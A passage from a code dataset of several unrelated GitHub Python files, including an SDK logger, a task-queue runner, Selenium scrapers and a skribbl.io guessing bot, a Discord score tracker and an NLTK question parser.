texts\n txt_handler[0].set_text('Training Data')\n txt_handler[3].set_text('Target Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n # hide learned angle and point\n learned_angle.remove()\n learned_point.set_visible(False)\n test = True\n\n return [*txt_handler, raw_angle, learned_point, raw_point]\n else:\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set learned angle\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n # set input texts\n txt_handler[0].set_text('After Training')\n txt_handler[3].set_text('Learned Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n txt_handler[4].set_bbox(bbox)\n \n # hide raw angle\n raw_angle.set_visible(False)\n raw_point.set_visible(False)\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n \n return [*txt_handler, learned_angle, learned_point, raw_point]\n\nani = animation.FuncAnimation(fig, updatefig, interval=3000, blit=True, repeat=False)\n#ani.save(\"single_neuron.mp4\")\nplt.show()","repo_name":"ey3lock3r/Complex-Valued-NN","sub_path":"complex_neuron_v2.py","file_name":"complex_neuron_v2.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37079550432","text":"import logging\nimport os\nimport platform\n\nfrom cuvis_il import cuvis_il\nfrom .cuvis_aux 
import SDKException\nfrom .cuvis_types import ComponentType\n\nimport cuvis.cuvis_types as internal\n\nfrom dataclasses import dataclass\n\nclass General(object):\n def __init__(self, path=\"\"):\n log_path = \".\"\n FORMAT = '%(asctime)s -- %(levelname)s: %(message)s'\n if os.path.exists(path):\n log_path = path + os.sep\n elif platform.system() == \"Linux\":\n log_path = os.path.expanduser('~') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n elif platform.system() == \"Windows\":\n log_path = os.getenv('APPDATA') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n \n if os.path.exists(log_path):\n logging.basicConfig(filename=log_path + \"cuvisSDK_python.log\",\n format=FORMAT,\n encoding='utf-8',\n level=logging.DEBUG,\n filemode='w')\n else:\n raise SDKException(\n \"path {} does not exist...\".format(os.path.abspath(log_path)))\n logging.info(\"Logger ready.\")\n\n if cuvis_il.status_ok != cuvis_il.cuvis_init(log_path):\n raise SDKException()\n pass\n\n @property\n def version(self) -> str:\n return cuvis_il.cuvis_version_swig()\n\n def set_log_level(self, lvl):\n lvl_dict = {\"info\": {\"cuvis\": cuvis_il.loglevel_info,\n \"logging\": logging.INFO},\n \"debug\": {\"cuvis\": cuvis_il.loglevel_debug,\n \"logging\": logging.DEBUG},\n \"error\": {\"cuvis\": cuvis_il.loglevel_error,\n \"logging\": logging.ERROR},\n \"fatal\": {\"cuvis\": cuvis_il.loglevel_fatal,\n \"logging\": logging.CRITICAL},\n \"warning\": {\"cuvis\": cuvis_il.loglevel_warning,\n \"logging\": logging.WARNING},\n }\n\n cuvis_il.cuvis_set_log_level(lvl_dict[lvl][\"cuvis\"])\n logging.basicConfig(level=lvl_dict[lvl][\"logging\"])\n\n\n@dataclass\nclass ComponentInfo(object):\n type: ComponentType = None\n display_name: str = None\n sensor_info: str = None\n user_field: str = None\n pixel_format: str = None\n\n def _get_internal(self):\n ci = cuvis_il.cuvis_component_info_t()\n ci.type = internal.__CuvisComponentType__[self.type]\n ci.displayname = self.display_name\n ci.sensorinfo = self.sensor_info\n ci.userfield = self.user_field\n ci.pixelformat = self.pixel_format\n return ci\n \n @classmethod\n def _from_internal(cls, ci):\n return cls(type=internal.__ComponentType__[ci.type],\n display_name=ci.displayname,\n sensor_info=ci.sensorinfo,\n user_field=ci.userfield,\n pixel_format=ci.pixelformat)\n","repo_name":"cubert-hyperspectral/cuvis.python","sub_path":"cuvis/General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39268298588","text":"import logging as log\nimport torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\n\n\ndef get_irreducable_losses_complete(dataloader, small_model):\n log.info('Calculating irreducible losses')\n irr_losses = []\n with torch.inference_mode():\n for idx, (data, target) in enumerate(dataloader):\n irr_losses.append(compute_irreducable_loss_batch(data, target, small_model))\n return irr_losses\n\n\ndef compute_irreducable_loss_batch(data, target, small_model):\n output = small_model(data)\n if str(type(output)) == \"\":\n output = output.logits\n return F.cross_entropy(\n output, target, reduction=\"none\"\n )\n\n\ndef compute_reducable_loss_batch(large_model: nn.Module, small_model: nn.Module, data, target):\n with torch.inference_mode():\n logits = large_model(data)\n if str(type(logits)) == \"\":\n logits = logits.logits\n model_loss = F.cross_entropy(logits, 
target, reduction=\"none\")\n irreducible_loss = compute_irreducable_loss_batch(data, target, small_model)\n reducible_loss = model_loss - irreducible_loss\n\n return model_loss, reducible_loss\n","repo_name":"TNJKvm/stood-over-june","sub_path":"src/utils/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34594477388","text":"\"\"\"\ntasq.remote.runner.py\n~~~~~~~~~~~~~~~~~~~~~\nRunner process, listening for incoming connections to schedule tasks to a pool\nof worker actors\n\"\"\"\nimport os\nimport asyncio\nfrom multiprocessing import Process, cpu_count\n\nimport tasq.worker as worker\nimport tasq.actors as actors\nfrom .backend import ZMQBackend\nfrom .connection import connect_redis_backend, connect_rabbitmq_backend\nfrom ..logger import get_logger\n\n\ndef max_workers():\n return (cpu_count() * 2) + 1\n\n\nclass Runner:\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._run = False\n self._unpickle = unpickle\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n\n def _respond(self, fut):\n self._backend.send_result(fut.result())\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n # Stop server connection\n self._run = False\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._run = True\n self._log.debug(\"Listening on %s\", self._backend)\n self.run()\n\n def run(self):\n while self._run:\n job = self._backend.recv(5, unpickle=self._unpickle)\n if not job:\n continue\n self._log.debug(\"Received job: %s\", job)\n fut = self._workers.route(job)\n fut.add_done_callback(self._respond)\n\n\nclass ZMQRunner:\n \"\"\"Runner process, handle requests asynchronously from clients and\n delegate processing of incoming tasks to worker processes, responses are\n sent back to clients by using a dedicated thread\n \"\"\"\n\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._unpickle = unpickle\n self._run = False\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n self._loop = asyncio.get_event_loop()\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n self._run = False\n # Cancel pending tasks (opt)\n for task in asyncio.Task.all_tasks():\n task.cancel()\n self._loop.stop()\n self._loop.close()\n # Stop server connection\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._backend.bind()\n self._run = True\n self._log.info(self._backend)\n self._loop.create_task(self.run())\n self._loop.run_forever()\n\n async def run(self):\n while self._run:\n try:\n if await self._backend.poll():\n job = await self._backend.recv(unpickle=self._unpickle)\n self._log.debug(\"Received job: %s\", job)\n f = self._workers.route(job)\n fut = asyncio.wrap_future(f)\n await self._backend.send(await fut)\n except asyncio.CancelledError:\n pass\n\n\nclass Runners:\n\n \"\"\"Class to 
handle a pool of runners on the same node\"\"\"\n\n def __init__(self, binds, signkey=None, unix_socket=False):\n # List of tuples (host, pport, pull_port) to bind to\n self._binds = binds\n # Digital sign data before send an receive it\n self._signkey = signkey\n # Unix socket flag, if set to true, unix sockets for interprocess\n # communication will be used and ports will be used to differentiate\n # push and pull channel\n self._unix_socket = unix_socket\n # Processes, equals the len of `binds`\n self._procs = []\n self._init_binds()\n\n def _serve_runner(self, host, psh_port, pl_port):\n pass\n # m = ZMQActorRunner(\n # host,\n # psh_port,\n # pl_port,\n # signkey=self._signkey,\n # unix_socket=self._unix_socket,\n # )\n # m.start()\n\n def _init_binds(self):\n self._procs = [\n Process(target=self._serve_runner, args=(host, psh_port, pl_port,))\n for host, psh_port, pl_port in self._binds\n ]\n\n def start_procs(self):\n for proc in self._procs:\n proc.start()\n try:\n for proc in self._procs:\n proc.join()\n except KeyboardInterrupt:\n # Clean up should be placed\n pass\n\n\nclass RunnerFactory:\n def __init__(self):\n self._builders = {}\n\n def register_builder(self, key, builder):\n self._builders[key] = builder\n\n def create(self, key, **kwargs):\n builder = self._builders.get(key)\n if not builder:\n raise ValueError(key)\n return builder(**kwargs)\n\n\ndef build_zmq_actor_runner(\n host,\n channel,\n router_class=actors.RoundRobinRouter,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=True,\n):\n push, pull = channel\n ctx = actors.get_actorsystem(f\"{host}:({push}, {pull})\")\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n unpickle,\n signkey,\n )\n\n\ndef build_zmq_queue_runner(\n host,\n channel,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=False,\n):\n push, pull = channel\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server, lambda: worker.build_jobqueue(num_workers), unpickle, signkey\n )\n\n\ndef build_redis_actor_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_redis_queue_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\ndef build_rabbitmq_actor_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_rabbitmq_queue_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, 
signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\nrunner_factory = RunnerFactory()\nrunner_factory.register_builder(\"ZMQ_ACTOR_RUNNER\", build_zmq_actor_runner)\nrunner_factory.register_builder(\"ZMQ_QUEUE_RUNNER\", build_zmq_queue_runner)\nrunner_factory.register_builder(\"REDIS_QUEUE_RUNNER\", build_redis_queue_runner)\nrunner_factory.register_builder(\"REDIS_ACTOR_RUNNER\", build_redis_actor_runner)\nrunner_factory.register_builder(\n \"AMQP_QUEUE_RUNNER\", build_rabbitmq_queue_runner\n)\nrunner_factory.register_builder(\n \"AMQP_ACTOR_RUNNER\", build_rabbitmq_actor_runner\n)\n","repo_name":"codepr/tasq","sub_path":"tasq/remote/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"53"} +{"seq_id":"7073235269","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport urllib.parse\nimport datetime as dt\n\"\"\"\nneeds.py는 키워드를 선택, url검색, 키워드 검색 시 날짜구분에 이용됨\n\"\"\"\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"DBP.settings\")\nimport django\ndjango.setup()\nfrom App.models import Data\n\nclass TwitterCrawling():\n keyword = \"\"\n\n def __init__(self):\n self.url1 = \"https://twitter.com/search?f=tweets&vertical=default&q=\"\n #self.url2 = urllib.parse.quote_plus(\", \".join(self.keyword))\n self.s_date = dt.date(year=2018, month=11, day=30)\n self.e_date = dt.date(year=2018, month=12, day=1)\n\n def InputKeyword(self, word):\n print(\"트위터에서 검색될 키워드 : \")\n self.keyword = word\n print(\"\\\"\" + self.keyword + \"\\\"\")\n return self.connect_chrome()\n\n def connect_chrome(self):\n print(\"Connecting chrome to tweet !\")\n self.url = str(self.url1 + self.keyword)\n\n # 드라이버 연결(Chrome)\n self.driver = webdriver.Chrome('C:/Users/User/Desktop/chromedriver.exe')\n # 암묵적으로 웹 자원 로드를 위해 2초까지 기다린다\n self.driver.implicitly_wait(2)\n\n # BeautifulSoup를 이용한 html 스크래핑\n self.driver.get(self.url + '%20since%3A' + str(self.s_date) + '%20until%3A' + str(self.e_date) + '&amp;amp;amp;amp;amp;lang=ko')\n self.html = self.driver.page_source\n self.soup = BeautifulSoup(self.html, 'html.parser')\n\n return self.parse_twitter_text()\n\n def parse_twitter_text(self):\n print(\"Parsing tweet text !(max = 20)\")\n # 내용 파싱(추출)\n lists = self.soup.find_all(\"p\", {\"class\": \"TweetTextSize\"})\n data_title = {}\n\n # 보여짐\n for i in lists:\n data_title[i.text] = i.text\n self.driver.quit()\n return data_title\n","repo_name":"JinMinChoi/DB_Project","sub_path":"DBP/first_tweet_new.py","file_name":"first_tweet_new.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19435041462","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport os\nimport time\nimport sys\nfrom threading import Thread\n\ndef try_word(word, known):\n try:\n if len(word) != len(known):\n raise ValueError(\"Word and known aren't the same length!\")\n x = 0\n for char in known:\n if word[x] == char or char == \"*\":\n if x == len(word) - 1:\n elem = driver.find_element_by_id(\"inputChat\")\n elem.clear()\n elem.send_keys(word) \n elem.send_keys(Keys.ENTER)\n time.sleep(1)\n else: \n x += 1\n continue\n else:\n break\n except Exception as e:\n print(e)\n\ndef get_words():\n method = input(\"1: Read words from file | 2: Enter words comma seperated | 3: Use words.txt >\")\n if method == \"1\":\n 
with open(input(\"Filename >\"), \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n elif method == \"2\":\t\n words = input(\"Enter the words seperatet by \\\",\\\" (no space):\")\n words = words.split(\",\")\n return words\n elif method == \"3\":\n with open(\"words.txt\", \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n else: \n print(\"Invalid input!\")\n return get_words()\n\ndef sort_words(words):\n longest = 0\n for word in words:\n if len(word) > longest:\n longest = len(word)\n all_words = {}\n for leng in range(longest):\n current_words = []\n for word in words:\n if len(word) == leng:\n current_words.append(word)\n all_words[leng] = current_words\n return all_words\n\ndef get_current_word():\n elem = driver.find_element_by_id(\"currentWord\")\n return elem.text\n\ndef get_player():\n players = driver.find_elements_by_class_name(\"player\")\n for player in players:\n info = player.find_elements_by_class_name(\"info\")\n nameElem = info[0].find_elements_by_class_name(\"name\")\n name = nameElem[0].text\n if \"(You)\" in name:\n return player\n\ndef clear_screen():\n # for windows\n if os.name == 'nt':\n _ = os.system('cls')\n # for mac and linux(here, os.name is 'posix')\n else:\n _ = os.system('clear')\n\ndef handleInput():\n global cmd\n global should_print\n global auto\n global clear\n\n while True:\n time.sleep(1)\n inp = input(\"\")\n if inp == \"len\":\n should_print = False\n leng = input(\"Enter the new length >\")\n should_print = True\n cmd = \"len \" + leng\n elif inp == \"quit\":\n cmd = \"quit\"\n sys.exit()\n elif inp == \"known\":\n should_print = False\n known = input(\"Enter what you know >\")\n should_print = True\n cmd = \"known \" + known\n elif inp == \"done\":\n cmd = \"done\"\n elif inp == \"auto\":\n auto = not auto\n elif inp == \"clear\":\n clear = not clear\n else:\n should_print = False\n if auto:\n print(\"Unknown command\\nUse one of these: len quit known done auto clear\")\n else:\n print(\"Unknown command\\nUse one of these: quit auto clear\")\n time.sleep(1)\n should_print = True\n\ndef run():\n global cmd\n global should_print\n global auto\n global done\n global clear\n player = None\n known = \"\"\n leng = 0\n\n while True:\n if leng == 0 and not auto:\n leng = input(\"Enter the length >\")\n known = \"*\" * int(leng)\n elif leng == 0:\n known = get_current_word().replace(\"_\", \"*\")\n leng = len(known)\n\n if player == None:\n player = get_player()\n\n current = 0\n list_len = len(words[int(leng)])\n\n for word in words[int(leng)]:\n current += 1\n\n if auto:\n if player.get_attribute(\"class\") == \"player guessedWord\" and not done:\n cmd = \"done\"\n temp = known\n known = get_current_word().replace(\"_\", \"*\")\n temp2 = leng\n leng = len(known)\n if len(known.replace(\"*\", \"\")) < len(temp.replace(\"*\", \"\")) or temp2 != leng:\n print(\"New word detected, restarting with length \" + str(leng))\n done = False\n break\n\n if cmd != \"\":\n if \"len \" in cmd:\n leng = int(cmd.replace(\"len \", \"\"))\n known = \"*\" * int(leng)\n print(\"Length set successfully\")\n cmd = \"\"\n break\n\n elif cmd == \"quit\":\n sys.exit()\n\n elif \"known\" in cmd:\n known = cmd.replace(\"known \", \"\")\n print(\"Set known to: \" + known)\n cmd = \"\"\n\n elif cmd == \"done\":\n if not auto:\n leng = 0\n 
else:\n done = True\n print(\"Word found: '\" + lastWord + \"', waiting for it to change...\")\n cmd = \"\"\n break\n\n if should_print and not done:\n if clear:\n clear_screen()\n percent = int(current * 100 / list_len)\n percent_string = \"[ \" + \" \" * (3 - len(str(percent))) + \"\" + str(percent) + \"% ]\"\n progress_bar_string = \"[\" + \"#\" * int(percent / 10) + \" \" * int(10 - int(percent / 10)) + \"]\"\n count_string = \"[ \" + \" \" * (len(str(list_len)) - len(str(current))) + \"\" + str(current) + \" / \" + str(list_len) + \" ]: \" \n print(percent_string + progress_bar_string + count_string + word)\n\n if not done:\n lastWord = word\n try_word(word, known)\n\n if not auto:\n leng = 0\n\ncmd = \"\"\nshould_print = True\nauto = input(\"Start with auto mode? True | False >\")\ndone = False\nclear = False\nwhile (not auto == \"True\") and (not auto == \"False\"):\n auto = input(\"Invalid input. True | False >\")\nwords = sort_words(get_words())\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\noptions.add_argument(\"--disable-extensions\")\ndriver = webdriver.Chrome(\".\\chromedriver.exe\", options=options)\ndriver.get(\"https://skribbl.io\")\n\ninput_thread = Thread(target=handleInput)\nrun_thread = Thread(target=run)\n\ninput_thread.start()\nrun_thread.start()","repo_name":"GaviTSRA/TSR-Website-Preview","sub_path":"software/skribblbot.py","file_name":"skribblbot.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38845449417","text":"import os\r\n\r\nimport pandas as pd\r\n\r\nfrom datetime import datetime, timedelta\r\nfrom discord.ext import commands\r\n\r\n\r\nDEFAULT_PATH = \"score_tracker.dat\"\r\nMIN_SCORE = -10\r\nMAX_SCORE = 10\r\n\r\n\r\nclass ScoreTracker(commands.Cog):\r\n \"\"\"\r\n Track T4g1 scores on jokes, provide its current average score as well as\r\n useful statistics\r\n \"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.tracker_user = None\r\n self.history = pd.DataFrame()\r\n self.fix_time = timedelta(\r\n minutes=int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n )\r\n\r\n self.load()\r\n\r\n def test(self):\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_USER\") is None\r\n ), \"SCORE_TRACKER_USER is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_TARGET\") is None\r\n ), \"SCORE_TRACKER_TARGET is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_FIX_TIME\") is None\r\n ), \"SCORE_TRACKER_FIX_TIME is not defined\"\r\n\r\n try:\r\n _ = int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n except Exception:\r\n self.fail(\"SCORE_TRACKER_FIX_TIME is not a proper integer\")\r\n\r\n def add_score(self, score):\r\n \"\"\"Adds the given score into the data\r\n Expect a sanitized score\r\n \"\"\"\r\n index = len(self.history)\r\n data = self.history.to_dict()\r\n data[\"date\"][index] = datetime.utcnow()\r\n data[\"score\"][index] = score\r\n\r\n print(\"T4g1 got a new score: {}\".format(score))\r\n\r\n self.history = pd.DataFrame.from_dict(data)\r\n\r\n self.persist()\r\n\r\n def remove_last(self):\r\n self.history = self.history[-1]\r\n\r\n self.persist()\r\n\r\n print(\"Score tracker entry removed\")\r\n\r\n def load(self):\r\n \"\"\"Load persisted data from disk\"\"\"\r\n try:\r\n self.history = pd.read_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH),\r\n parse_dates=[\"date\"],\r\n )\r\n except FileNotFoundError:\r\n pass\r\n\r\n if len(self.history) 
== 0:\r\n self.history = pd.DataFrame.from_dict({\"date\": [], \"score\": []})\r\n\r\n self.history.set_index(\"date\")\r\n\r\n print(\"Loaded {} tracking data\".format(len(self.history)))\r\n\r\n def persist(self):\r\n \"\"\"Persist data on disk\"\"\"\r\n self.history.to_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH), index=False\r\n )\r\n\r\n def is_in_range(self, value):\r\n \"\"\"Tells if the value is in range\"\"\"\r\n return value >= MIN_SCORE and value <= MAX_SCORE\r\n\r\n async def is_tracker_user(ctx):\r\n return ctx.author == ctx.cog.tracker_user\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n tracker_user_name = os.getenv(\"SCORE_TRACKER_USER\", default=\"\")\r\n self.tracker_user = self.bot.get_guild().get_member_named(\r\n tracker_user_name\r\n )\r\n\r\n tracker_target_name = os.getenv(\"SCORE_TRACKER_TARGET\", default=\"\")\r\n self.tracker_target = self.bot.get_guild().get_member_named(\r\n tracker_target_name\r\n )\r\n\r\n assert (\r\n self.tracker_user\r\n ), \"The privilegied user was not found, check configuration\"\r\n\r\n @commands.command(name=\"savg\")\r\n async def average(self, ctx):\r\n \"\"\"Displays score tracker average score\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\r\n \"No score given yet, can't average the void yet\"\r\n )\r\n\r\n avg = self.history[\"score\"].sum() / len(self.history)\r\n\r\n await ctx.send(\"Average score: {:.2f}\".format(avg))\r\n\r\n print(\"Giving score tracking average\")\r\n\r\n @commands.command(name=\"sstats\")\r\n async def stats(self, ctx):\r\n \"\"\"Displays score tracker stats\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"No score given yet, can't stat the void yet\")\r\n\r\n df = self.history\r\n\r\n first_of_month = datetime.utcnow().date().replace(day=1)\r\n first_of_month = datetime.combine(first_of_month, datetime.min.time())\r\n\r\n first_of_year = datetime.utcnow().date().replace(month=1, day=1)\r\n first_of_year = datetime.combine(first_of_year, datetime.min.time())\r\n\r\n this_week = df[\"date\"] >= datetime.utcnow() - timedelta(weeks=1)\r\n this_month = df[\"date\"] >= first_of_month\r\n this_year = df[\"date\"] >= first_of_year\r\n\r\n avg_week = df[this_week][\"score\"].sum() / len(df[this_week])\r\n avg_month = df[this_month][\"score\"].sum() / len(df[this_month])\r\n avg_year = df[this_year][\"score\"].sum() / len(df[this_year])\r\n\r\n await ctx.send(\r\n \"Average this week: {:.2f} month: {:.2f} year: {:.2f}\\n\"\r\n \"This week: max: {}, min: {}\\n\"\r\n \"This month: max: {}, min: {}\\n\"\r\n \"All time: max: {}, min: {}\".format(\r\n avg_week,\r\n avg_month,\r\n avg_year,\r\n df[this_week][\"score\"].max(),\r\n df[this_week][\"score\"].min(),\r\n df[this_month][\"score\"].max(),\r\n df[this_month][\"score\"].min(),\r\n df[\"score\"].max(),\r\n df[\"score\"].min(),\r\n )\r\n )\r\n\r\n print(\"Giving score tracking stats\")\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def score(self, ctx, score: int):\r\n \"\"\"[score]/-[score]: Add/remove score\"\"\"\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n self.add_score(score)\r\n\r\n if score > 0:\r\n await ctx.send(\"GG {}!\".format(self.tracker_target.mention))\r\n elif score == 0:\r\n await ctx.send(\"Coucou {}!\".format(self.tracker_target.mention))\r\n else:\r\n await ctx.send(\"It's bad 
{}!\".format(self.tracker_target.mention))\r\n\r\n await self.bot.publish(ctx, \"score_tracker.scored\", score)\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def fix(self, ctx, score: int):\r\n \"\"\"[score]: Used to fix the latest score entered\r\n Available during SCORE_TRACKER_CORRECTION_TIME minutes\r\n \"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"I have no score to fix!\")\r\n\r\n if datetime.utcnow() - self.history.loc[-1][\"date\"] > self.fix_time:\r\n return await ctx.send(\r\n \"It's too late to go back now, \"\r\n \"you will have to live with that mistake forever\"\r\n )\r\n\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n if self.history.loc[-1].score == score:\r\n self.remove_last()\r\n\r\n await ctx.send(\r\n \"Previous score removed! Score was: {}\".format(score)\r\n )\r\n else:\r\n await ctx.send(\r\n \"Score does not match! Score was: {}\".format(\r\n self.history.loc[-1].score\r\n )\r\n )\r\n\r\n @score.error\r\n @fix.error\r\n async def error_handler(self, ctx, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(\r\n \"The following argument is missing: {}\".format(error.param)\r\n )\r\n\r\n elif isinstance(error, commands.CheckFailure):\r\n await ctx.send(\"You cannot use that command!\")\r\n\r\n elif isinstance(error, commands.BadArgument):\r\n await ctx.send(\"The score need to be an integer\")\r\n\r\n else:\r\n print(\r\n \"Encountered unexpected error: {} {}\".format(error, type(error))\r\n )\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(ScoreTracker(bot))\r\n","repo_name":"T4g1/z14","sub_path":"modules/score_tracker.py","file_name":"score_tracker.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74385996968","text":"from nltk.tokenize import word_tokenize\nimport nltk\nfrom nltk.corpus import stopwords\nimport sparql\n\nsearch = raw_input(\"Search:\")\nprocessedWords = []\nwords = nltk.word_tokenize(search)\nsTwords = stopwords.words('english')\n\n#Removing stopwords\nfor word in words:\n if word not in sTwords:\n processedWords.append(word)\n\ntagged_words = nltk.pos_tag(processedWords)\nprint('Searching...')\n\n#Case where was born\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'Where' and tagged_words[1][1] == 'VBN'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whereWasBorn(term)\n\n#Case who\nif (tagged_words[0][1] == 'WP'):\n name = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n name += word[0]\n else:\n name += ' ' + word[0]\n \n i += 1\n sparql.whoIs(name)\n\n#Case where\nif (tagged_words[0][1] == 'WRB'):\n place = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WRB' and word[1] != '.'):\n if (i == 0):\n place += word[0]\n else:\n place += ' ' + word[0]\n\n i += 1\n \n sparql.whereIs(place)\n\n#Case what\nif (tagged_words[0][1] == 'WP' and tagged_words[0][0] == 'What'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WP' and word[1] != '.'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whatIs(term)\n\n# case how to cook\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'How'):\n term = ''\n i = 
